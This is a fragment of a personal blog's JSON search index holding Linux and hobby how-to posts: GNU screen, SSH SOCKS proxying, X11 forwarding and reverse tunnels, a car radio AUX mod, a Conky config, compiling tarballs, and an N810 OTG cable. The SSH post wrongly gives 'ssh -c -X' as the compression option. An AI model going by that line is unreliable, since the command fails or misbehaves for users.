I usually like the primary/on-board card eth0, and all additional cards eth1-n, however the installer often has its own ideas. So this is how to correct it!\u003c/p\u003e","title":"Switch Network Interface in Linux"},{"content":"Part 1 - Screen Screen is a program that can create virtual terminals inside your current session. If you are familiar with tabbed web browsers, think of screen as adding tabs to your terminal. And if your server allows it can allow you to disconnect sessions and keep them running in the background, even if you log out.\nYou can install screen on Debian with apt-get by running sudo apt-get install screen and yum install screen for rpm based systems.\nStart screen by running:\nscreen The first time you run screen it will create a new window. This window is just like the session you left behind to enter screen. You can run any program you usually would have, and exit or close the window by typing exit and pressing enter.\nNow for the fun part! Enter a new screen session by running screen. You can now run any program you like and leave it running, start your cli mail client or wget a large file. Now press Ctrl-a and then c. This will create a new windows (or tab if you will) in your current screen session. Ctrl-a is the screen hot-key to allow the user to enter a command to screen and not the currently running program or the current shell. In the previous example (Ctrl-a c), we told screen we were going to give it a command, then gave it the \u0026lsquo;c\u0026rsquo; command, which stands for Create. As you can guess, this created a new screen window.\nSome of the important screen commands are Ctrl-a k: kills the current window, same as typing exit. Ctrl-a w: lists all open windows, Ctrl-a n: go to the next window or cycles through the available windows. Ctrl-a d: this will detach the current sessions, this allows the sessions to run in the background while you are dropped back into your shell. You can resume the session anytime later (even after logging out) by running:\nscreen -r [SESSION_NAME] You can view a list of the available screen sessions by running:\nscreen -ls However there is a wild-card resume that will resume the last open session or create one if there are none, to resume any open session run:\nscreen -R Screen can also do much more, If you want to learn more take a look at the screen manual.\nPart 2 - SSH as a proxy Openssh server has the ability to be used as a SOCKS proxy. Using it as a socks proxy will allow you to run your proxied applications network traffic through the ssh server.\nWindows with putty You can use putty to allow a windows client to connect to the ssh/socks proxy. On the putty client go to the Tunnels page and enter any source port you want, this will be the port that you will tell your local application to use at the proxy server port. Leave the destination field blank and select the dynamic check-box. Select Add to add the port. It should look like this:\nFrom here once you connect to the ssh server the port you specified on 127.0.0.1 or localhost will open as a socks proxy.\nLinux To connect to an ssh server and use it as a SOCKS proxy using Linux connect to the ssh server the way you normally would but add -D [PORT] as a parameter. -D tells the destination port to be dynamic and [PORT] is the port that will listen for the proxy server on the local computer, just remember if you are not root locally your port needs to be over 1024. Here is an example:\nssh -D 1234 mrlanrat@sshserver.com Using the Proxy Here is an example setting up the proxy with Firefox, it should be a similar configuration for other programs.\nPart 3 - X11 Forwarding X11 forwarding allows you to run X or graphical applications on the server over ssh. To forward X programs over ssh on Linux apply the -X parameter, below is an example.\nssh -X user@host If you want to compress the X information while it is being transferred apply the -c argument.\nssh -c -X user@host And you can start X11 applications and allow the shell to still remain active by applying a \u0026amp; to the end of the application. example:\nfirefox \u0026amp; If you want to start the complete X desktop over ssh and not just a single application you can run:\nstartx On windows you can enable ssh in putty by clicking the enable X11 forwarding checkbox in the X11 tab. screenshot below:\nPart 4 - Reverse SSH You can ssh into a server that is behind a NAT through a reverse ssh server. Put simply the server would need to ssh into either the client machine or a machine that the client has access to, like a middleman. When the server sshs into the other computer you will need to have it tunnel its port 22 (or the port that ssh is running on) to any port on the computer client or middleman that the server is sshing to. Below is an example of this:\nssh -R 2222:localhost:22 user@client This assumes that port 2222 is the port the client or middleman will have open that will allow the client to ssh into the server. user@client is the user and host of the client or middleman server. From there have the client either ssh into itself or the middleman server and it will be tunneled into the server.\n","permalink":"https://lanrat.com/posts/ssh-tips-and-tricks/","summary":"\u003ch2 id=\"part-1---screen\"\u003ePart 1 - Screen\u003c/h2\u003e\n\u003cp\u003eScreen is a program that can create virtual terminals inside your current session. If you are familiar with tabbed web browsers, think of screen as adding tabs to your terminal. And if your server allows it can allow you to disconnect sessions and keep them running in the background, even if you log out.\u003c/p\u003e\n\u003cp\u003eYou can install screen on Debian with apt-get by running \u003ccode\u003esudo apt-get install screen\u003c/code\u003e and \u003ccode\u003eyum install screen\u003c/code\u003e for rpm based systems.\u003c/p\u003e","title":"SSH Tips and Tricks"},{"content":"Here is how I added an AUX input to my Delco Radio/CD player and a nice mount for my N810.\nPart 1 - Adding The AUX Input First off This worked on my Delco radio. It may work on yours, it may not. On My radio there is a nice AUX button right under the CD button. This goes to an AUX connector on the back of the unit. This is a Delco AUX plug. It was meant to go to a separate tape deck. Unfortunately, this AUX plug requires an intelligent device to be connected in order to function. There is also a device you can buy that will plug into this AUX port and give you a normal RCA connection. However, the goal of this project is to spend as little money as possible while having the fun of doing it yourself.\nWarning If you disconnect your radio from your car battery or any other source of power it may lock itself, this is part of the anti-theft feature. If your radio locks itself there is a link at the bottom with unlocking instructions.\nThe idea is to splice into the CD\u0026rsquo;s input with your own input. Here is the connector and the pins you will need. The ground is in between the Left and Right, but you can use any ground.\nHere is my dash before the mod\nOpening the Radio\nSplicing the needed wires\nI wired my 3.5mm AUX jack in the front of the unit. It barely fit. It would have been a lot easier to run the wires out of the unit and mount it elsewhere in your car. Anyway the idea is when you are on the CD input it will use the audio from the CD player unless there is a jack in the AUX input. I used a Radio Shack part # 274-0246 similar jacks will work but they may not allow you to switch from CD to AUX. Here is the wiring diagram of the jack.\nPin 1 - Ground - connect to radio ground Pin 2 - Left Channel - wire from CD connector on main circuit board Pin 3 - Left Channel - wire coming from CD player module Pin 4 - Right Channel - wire coming from CD player module Pin 5 - Right Channel - wire from CD connector on main circuit board Here is the jack wired through the front panel\nTesting it with my N810 before I put it all together\nPutting it all back together\nPart 2 - N810 Mount I did not want to spend the money to buy the rest of the mount that the N810 came with, or make anything that was too permanent. So I took the N810 half of the mount (the part the N810 came with) and decided to mount it in the empty slot in my dash. To do that I just screwed the end of it into a 3.5 inch long 2×4, and painted black to match. Here is the completed mount on its own, and in my dash.\nPart 3 - Finished Here is the final product with the N810 all hooked up\nUpdate I also got an N810 car charger to keep it going, playing lots of audio can drain the battery, and with Canola I can keep the screen lit so I can always see what is playing.\nUpdate 2 When using the AUX in you need to turn the volume up really high, that means that when you unplug it it will be extra loud, and hurt your speakers. in addition since the wires are so close together some of the CD player\u0026rsquo;s sound signal will get mixed in with your AUX input due to electromagnetic radiation. To fix that I made an audio CD with 80 minutes of silence. I used Audacity to create one long audio file, then burned it to a CD. It fixed this problem. I will upload a compressed ISO of this disk soon.\nRelated Links Where I got the mod idea and information from\nDirections to unlock your radio\nMore assorted pinouts\n","permalink":"https://lanrat.com/posts/car-aux-mod/","summary":"\u003cp\u003eHere is how I added an AUX input to my Delco Radio/CD player and a nice mount for my N810.\u003c/p\u003e\n\u003ch1 id=\"part-1---adding-the-aux-input\"\u003ePart 1 - Adding The AUX Input\u003c/h1\u003e\n\u003cp\u003eFirst off This worked on my Delco radio. It may work on yours, it may not. On My radio there is a nice AUX button right under the CD button. This goes to an AUX connector on the back of the unit. This is a Delco AUX plug. It was meant to go to a separate tape deck. Unfortunately, this AUX plug requires an intelligent device to be connected in order to function. There is also a device you can buy that will plug into this AUX port and give you a normal RCA connection. However, the goal of this project is to spend as little money as possible while having the fun of doing it yourself.\u003c/p\u003e","title":"Car Aux Mod"},{"content":"Conky is a system monitor for Linux. It can tell you almost anything about your computer, such as CPU usage, memory usage, network information, and almost anything else. Here is what my Conky configuration looks like on my desktop.\nTo install Conky on a RPM based distribution run\nyum install conky Or on a Debian based distribution run\nsudo apt-get install conky To get yours to look like that you need to put a file named .conkyrc in your home folder. Your home folder is usually /home/$USER.\nThis conky setup is very dynamic. It will display 1-4 processors or cores, display the main root file system, up to 5 removable drives, and it will show all of the active network interfaces (wireless, wired, and wireless broadband). If you use a different network configuration, for example two wired connections, you can remove one of the unused ones and replace it with yours, or just add another entry.\nMy .conkyrc file looks like this\n# Conky configuration # Set to yes if you want Conky to be forked in the background background no # Font size? font Sans:size=8 # Use Xft? use_xft yes # Text alpha when using Xft xftalpha 0.9 # Update interval in seconds update_interval 1.0 # This is the number of times Conky will update before quitting. # Set to zero to run forever. total_run_times 0 # Text alignment, other possible values are commented #alignment top_left #alignment top_right #alignment bottom_left alignment bottom_right #alignment none # Create own window instead of using desktop (required in nautilus) own_window yes # If own_window is yes, you may use type normal, desktop or override own_window_type normal # Use pseudo transparency with own_window? own_window_transparent yes # If own_window_transparent is set to no, you can set the background color here own_window_colour black # If own_window is yes, these window manager hints may be used # If own_window is yes, these window manager hints may be used own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager # Use double buffering (reduces flicker, may not work for everyone) double_buffer yes # Minimum size of text area minimum_size 200 5 # Draw shades? draw_shades yes # Draw outlines? draw_outline no # Draw borders around text draw_borders no # Draw borders around graphs draw_graph_borders yes # Default colors and also border colors default_color white default_shade_color black default_outline_color black # Text alignment, other possible values are commented #alignment top_left alignment top_right #alignment bottom_left #alignment bottom_right #alignment none # Gap between borders of screen and text # same thing as passing -x at command line gap_x 12 gap_y 35 # Subtract file system buffers from used memory? no_buffers no # set to yes if you want all text to be in uppercase uppercase no # number of cpu samples to average # set to 1 to disable averaging cpu_avg_samples 1 # number of net samples to average # set to 1 to disable averaging net_avg_samples 1 # Force UTF8? note that UTF8 support required XFT override_utf8_locale no TEXT ${color white}SYSTEM: $nodename $machine ${hr 1}${color} Uptime: $alignr$uptime CPU: ${alignr}${freq_dyn} MHz Processes: ${alignr}$processes ($running_processes running) Load: ${alignr}$loadavg ${if_existing /sys/devices/system/cpu/cpu0}CPU1 ${alignr}${cpu cpu1}% ${cpubar cpu1 4}${endif}${if_existing /sys/devices/system/cpu/cpu1} CPU2 ${alignr}${cpu cpu2}% ${cpubar cpu2 4}${endif}${if_existing /sys/devices/system/cpu/cpu2} CPU3 ${alignr}${cpu cpu3}% ${cpubar cpu3 4}${endif}${if_existing /sys/devices/system/cpu/cpu3} CPU4 ${alignr}${cpu cpu4}% ${cpubar cpu4 4}${endif} ${cpugraph 20} Ram ${alignr}$mem / $memmax ($memperc%) ${membar 4} Swap ${alignr}$swap / $swapmax ($swapperc%) ${swapbar 4} Highest CPU $alignr CPU% MEM% ${top name 1}$alignr${top cpu 1}${top mem 1} ${top name 2}$alignr${top cpu 2}${top mem 2} ${top name 3}$alignr${top cpu 3}${top mem 3} Highest MEM $alignr CPU% MEM% ${top_mem name 1}$alignr${top_mem cpu 1}${top_mem mem 1} ${top_mem name 2}$alignr${top_mem cpu 2}${top_mem mem 2} ${top_mem name 3}$alignr${top_mem cpu 3}${top_mem mem 3} ${color white}FILESYSTEMS ${hr 1}${color} Root ${alignr}${fs_free /} / ${fs_size /} ${fs_bar 4 /}${if_mounted /media/disk} Disk1 ${alignr}${fs_free /media/disk} / ${fs_size /media/disk} ${fs_bar 4 /media/disk}${endif}${if_mounted /media/disk-1} Disk2 ${alignr}${fs_free /media/disk-1} / ${fs_size /media/disk-1} ${fs_bar 4 /media/disk-1}${endif}${if_mounted /media/disk-2} Disk3 ${alignr}${fs_free /media/disk-2} / ${fs_size /media/disk-2} ${fs_bar 4 /media/disk-2}${endif}${if_mounted /media/disk-3} Disk4 ${alignr}${fs_free /media/disk-3} / ${fs_size /media/disk-3} ${fs_bar 4 /media/disk-3}${endif}${if_mounted /media/disk-4} Disk5 ${alignr}${fs_free /media/disk-4} / ${fs_size /media/disk-4} ${fs_bar 4 /media/disk-4}${endif} ${color white}NETWORK ${hr 1}${color} ${if_existing /sys/class/net/eth0/operstate up}IP (eth0):$alignr${addr eth0} Down: ${downspeed eth0} k/s ${alignr}Up: ${upspeed eth0} k/s ${downspeedgraph eth0 20,90} ${alignr}${upspeedgraph eth0 20,90} Total: ${totaldown eth0} ${alignr}Total: ${totalup eth0} ${endif}${if_existing /sys/class/net/wlan0/operstate up}IP (wlan0):$alignr${addr wlan0} AP: ${wireless_essid wlan0} ${alignr}Bitrate: ${wireless_bitrate wlan0} Down: ${downspeed wlan0} k/s ${alignr}Up: ${upspeed wlan0} k/s ${downspeedgraph wlan0 20,90} ${alignr}${upspeedgraph wlan0 20,90} Total: ${totaldown wlan0} ${alignr}Total: ${totalup wlan0} ${endif}${if_existing /sys/class/net/ppp0/operstate}IP (ppp0):$alignr${addr ppp0} Down: ${downspeed ppp0} k/s ${alignr}Up: ${upspeed ppp0} k/s ${downspeedgraph ppp0 20,90} ${alignr}${upspeedgraph ppp0 20,90} Total: ${totaldown ppp0} ${alignr}Total: ${totalup ppp0}${endif} The Conky homepage\n","permalink":"https://lanrat.com/posts/conky/","summary":"\u003cp\u003eConky is a system monitor for Linux. It can tell you almost anything about your computer, such as CPU usage, memory usage, network information, and almost anything else. Here is what my Conky configuration looks like on my desktop.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"conky\" loading=\"lazy\" src=\"/posts/conky/images/conky.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eTo install Conky on a RPM based distribution run\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eyum install conky\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eOr on a Debian based distribution run\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-shell\" data-lang=\"shell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt-get install conky\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eTo get yours to look like that you need to put a file named \u003ccode\u003e.conkyrc\u003c/code\u003e in your home folder. Your home folder is usually \u003ccode\u003e/home/$USER\u003c/code\u003e.\u003c/p\u003e","title":"Conky"},{"content":"From time to time every Linux user will run across a program that does not come in a nice packaged DEB or RPM. Often these come in the form of a tar.gz, tgz, tar.bz, tar, gz, tar.bz2 or tbz2 format. This is how you can make use of them. Remember to have a compiler installed and any dependencies for the software you are installing.\nExtract To uncompress your file run the following command that applies to your extension.\ntar -zxvf file.tar.gz tar -zxvf file.tgz tar -jxvf file.tar.bz tar -xvf file.tar gunzip file.gz tar jxf file.tar.bz2 tar jxf file.tbz2 Compile Often software will come with a README or install file that should give you instructions on how to install it and any required dependencies as well as how to use it. It will probably say the same I have here, or something similar. Once you extract the source, cd into the newly created directory.\nls cd path-to-software/ Now, as root, configure the software. This sets up the software and compiler for your system.\n./configure make Install Okay, now for the last and simplest step, the install.\nmake install Everything should have gone well; enjoy your new software!\n","permalink":"https://lanrat.com/posts/extract-compile-and-install-anything-in-linux/","summary":"\u003cp\u003eFrom time to time every Linux user will run across a program that does not come in a nice packaged DEB or RPM. Often these come in the form of a tar.gz, tgz, tar.bz, tar, gz, tar.bz2 or tbz2 format. This is how you can make use of them. Remember to have a compiler installed and any dependencies for the software you are installing.\u003c/p\u003e\n\u003ch2 id=\"extract\"\u003eExtract\u003c/h2\u003e\n\u003cp\u003eTo uncompress your file run the following command that applies to your extension.\u003c/p\u003e","title":"Extract, Compile, and Install Anything in Linux"},{"content":"The Nokia N810 has an OTG or On-The-Go USB controller, it allows the device to function in both client and host mode. By default it is in client mode so when you plug it into your computer it acts as a USB storage device. It can be put into host mode either by running a program on the tablet that will put it into host mode or by using the OTG trigger. The USB plug on the tablet has 5 pins rather than just the standard 4 USB uses. If the extra pin is grounded it will put the N810 into host mode.\nThe same is true for the N800, but the N800 uses a Mini USB connector. The N810 uses Micro USB.\nThis is what I used to make my adapter- USB Extension Cable (any cable with a female USB type A connector will work)\nMicro USB cable with male connector Solder Shrink tubing/Electrical Tape Cut the two cables and separate the wires\nThis is as simple as connecting the same color wires together: red to red, black to black, green to green, white to white, and finally the shield. I put each individual wire in shrink tubing and then the two wires in a larger piece of shrink tubing. I tried to ground the fifth pin to have it be a true OTG cable, but my soldering iron is too big and the connector is too small. (See the out-of-focus picture below). If anyone has any suggestions please let me know in the comments. So for now I am using one of the programs that can put the tablet in host mode for you.\nTesting Time! The device can power the devices, but it will drain your battery faster. I have tested it with USB flash drives, memory card readers, USB hubs, keyboards, and CD-ROM drives. All worked fine with no problem (The CD drive had to be manually mounted)\n","permalink":"https://lanrat.com/posts/n810-usb-otg-adapter/","summary":"\u003cp\u003eThe Nokia N810 has an OTG or On-The-Go USB controller, it allows the device to function in both client and host mode. By default it is in client mode so when you plug it into your computer it acts as a USB storage device. It can be put into host mode either by running a program on the tablet that will put it into host mode or by using the OTG trigger. The USB plug on the tablet has 5 pins rather than just the standard 4 USB uses. If the extra pin is grounded it will put the N810 into host mode.\u003c/p\u003e","title":"N810 USB OTG Adapter"}]